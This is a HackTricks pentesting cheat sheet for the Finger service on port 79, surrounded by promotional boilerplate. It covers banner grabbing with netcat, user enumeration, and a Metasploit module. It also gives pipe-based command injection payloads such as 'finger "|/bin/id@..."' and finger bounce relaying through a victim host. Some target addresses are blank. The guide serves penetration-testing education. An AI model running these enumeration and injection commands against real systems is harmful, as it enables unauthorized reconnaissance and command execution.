# 79 - Pentesting Finger
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
## **Basic Info** The **Finger** program/service is utilized for retrieving details about computer users. Typically, the information provided includes the **user's login name, full name**, and, in some cases, additional details. These extra details could encompass the office location and phone number (if available), the time the user logged in, the period of inactivity (idle time), the last instance mail was read by the user, and the contents of the user's plan and project files. **Default port:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Enumeration** ### **Banner Grabbing/Basic connection** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **User enumeration** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` Alternatively you can use **finger-user-enum** from [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), some examples: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap execute a script for doing using default scripts** ### Metasploit uses more tricks than Nmap ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan * `port:79 USER` ## Command execution ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ```
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.